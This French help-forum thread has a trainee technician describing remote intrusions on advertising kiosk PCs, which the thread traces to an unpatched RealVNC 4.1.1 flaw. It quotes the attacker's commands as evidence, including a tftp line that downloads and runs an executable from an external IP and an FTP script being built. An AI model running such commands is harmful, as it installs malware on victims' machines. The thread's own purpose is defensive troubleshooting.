[BackDoor] Ligne de commande
Résolu
Theartemis
Messages postés
13
Statut
Membre
-
Utilisateur anonyme -
Utilisateur anonyme -
Bonjour, je suis en formation Maintenance et support informatique dans une petite boite de communication audiovisuelle, nous fournissons à nos clients des PC servant à la diffusion de message publicitaires dans leurs officines.
Ces PC sont conçus par une boite externe et le système d'exploitation est une version de Windows XP Embedded fourni par le propriétaire de notre solution de diffusion.
Nous nous chargeons juste de paramètrer le réseau des clients, d'installer VNC et d'activer le logiciel de diffusion, nous envoyons ensuite la station au client qui la branche sur son modem (paramétré par nous également) afin de pouvoir mettre à jour leurs messages publicitaires depuis les locaux de notre entreprise.
Nous avons un problème sur les deux dernières stations livrées, la diffusion se fait sous une session utilisateur restreinte (Pas d'explorer, juste accès au panneau de controle lorsqu'on presse ctrl + alt + suppr) de temps en temps, le gestionnaire de tâche s'ouvre tout seul mais plus grave, il arrive aussi que le gestionnaire de ligne de commande s'ouvre et ces commandes sont tapées
C:\windows\system32>cmd /c echo open 83.193.60.xxx 37095 >> ik
&echo user muha haha >> ik &echo
Ces problèmes apparaissent à intervalles réguliers et sont plutôt gênant pour les clients.
Sauriez vous comment y remédier?
Merci d'avance
Cordialement.
Ces PC sont conçus par une boite externe et le système d'exploitation est une version de Windows XP Embedded fourni par le propriétaire de notre solution de diffusion.
Nous nous chargeons juste de paramètrer le réseau des clients, d'installer VNC et d'activer le logiciel de diffusion, nous envoyons ensuite la station au client qui la branche sur son modem (paramétré par nous également) afin de pouvoir mettre à jour leurs messages publicitaires depuis les locaux de notre entreprise.
Nous avons un problème sur les deux dernières stations livrées, la diffusion se fait sous une session utilisateur restreinte (Pas d'explorer, juste accès au panneau de controle lorsqu'on presse ctrl + alt + suppr) de temps en temps, le gestionnaire de tâche s'ouvre tout seul mais plus grave, il arrive aussi que le gestionnaire de ligne de commande s'ouvre et ces commandes sont tapées
C:\windows\system32>cmd /c echo open 83.193.60.xxx 37095 >> ik
&echo user muha haha >> ik &echo
Ces problèmes apparaissent à intervalles réguliers et sont plutôt gênant pour les clients.
Sauriez vous comment y remédier?
Merci d'avance
Cordialement.
A voir également:
- [BackDoor] Ligne de commande
- Invite de commande - Guide
- Partage de photos en ligne - Guide
- Formulaire en ligne de meta - Guide
- Commande terminal mac - Guide
- Mètre en ligne - Guide
10 réponses
Juste une suggestion...on dirait un script qui s'ouvre!
recherches si tu ne trouves pas ---->
*.bat sur ces machines...dès fois qu'un petit génie s'amuse ?
ça me paraît curieux quand même....
ou alors quoi ? une commande en mode direct ?
je suis :-/
recherches si tu ne trouves pas ---->
*.bat sur ces machines...dès fois qu'un petit génie s'amuse ?
ça me paraît curieux quand même....
ou alors quoi ? une commande en mode direct ?
je suis :-/
Pas de batch, un scan secuser en ligne ne donne rien.
Par contre, pendant que je lançais le scan quelqu'un d'autre a pris la main et a tapé la commande suivante dans executer
%comscpec% /c echo Reparing user32.dll & echo Please wait...
& tftp -i 75.24.205.xxx get deizvrkx.exe & start deizvrkx&
Le gestionnaire de ligne de com s'est ouvert, je l'ai fermé et il a abandonné.
Par contre, pendant que je lançais le scan quelqu'un d'autre a pris la main et a tapé la commande suivante dans executer
%comscpec% /c echo Reparing user32.dll & echo Please wait...
& tftp -i 75.24.205.xxx get deizvrkx.exe & start deizvrkx&
Le gestionnaire de ligne de com s'est ouvert, je l'ai fermé et il a abandonné.
tentative d'infection de virus ça :
deizvrkx.exe
tu mets un keylogger sur chaque station...(je plaisante !)
Non...mais tu as une piste à mon avis !
Il y a un pirate dans la place ?
deizvrkx.exe
tu mets un keylogger sur chaque station...(je plaisante !)
Non...mais tu as une piste à mon avis !
Il y a un pirate dans la place ?
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
D'accord, mais tu me croire qu"il a quand même quelques connaissances en la matière !!
ce machin est un nom aléatoire--->
deizvrkx.exe
Je suppose qu'il n'y a pas moyen de mettre un fire-wall sur chaque machine ?
ce machin est un nom aléatoire--->
deizvrkx.exe
Je suppose qu'il n'y a pas moyen de mettre un fire-wall sur chaque machine ?
Bin, les modems fournis sont déja equipés de firewall.
Une CEBOX pour l'un qui est au client (Bon ok...) et l'autre est un DLINK DSL-504T
On devrait pouvoir activer le firewall de windows mais je doute de son efficacité.
Une CEBOX pour l'un qui est au client (Bon ok...) et l'autre est un DLINK DSL-504T
On devrait pouvoir activer le firewall de windows mais je doute de son efficacité.
Celui de xp....une véritable passoire !
Sinon, tu as des gratuits, qui sont pas mal.
Zone alarm/Kerio/ en tous cas une chose est sûr...pour le moment il passe au-dessus ...et à ce train-là tu risque de te retrouver avec tous le système infecté !
C'est ce qu'il cherche à mon avis !
Sinon, tu as des gratuits, qui sont pas mal.
Zone alarm/Kerio/ en tous cas une chose est sûr...pour le moment il passe au-dessus ...et à ce train-là tu risque de te retrouver avec tous le système infecté !
C'est ce qu'il cherche à mon avis !
Je pense avoir résolu le problème.
Nous utilisons Real VNC pour la télémaintenance, la version que nous utilisions jusqu'ici était la 4.1.1, or une faille permettant de prendre le contrôle du PC a distance sans utiliser de mot de passe a été déclarée en Mai 2006.
Le passage à la 4.1.2 à apparemment résolu le problème.
Nous utilisons Real VNC pour la télémaintenance, la version que nous utilisions jusqu'ici était la 4.1.1, or une faille permettant de prendre le contrôle du PC a distance sans utiliser de mot de passe a été déclarée en Mai 2006.
Le passage à la 4.1.2 à apparemment résolu le problème.
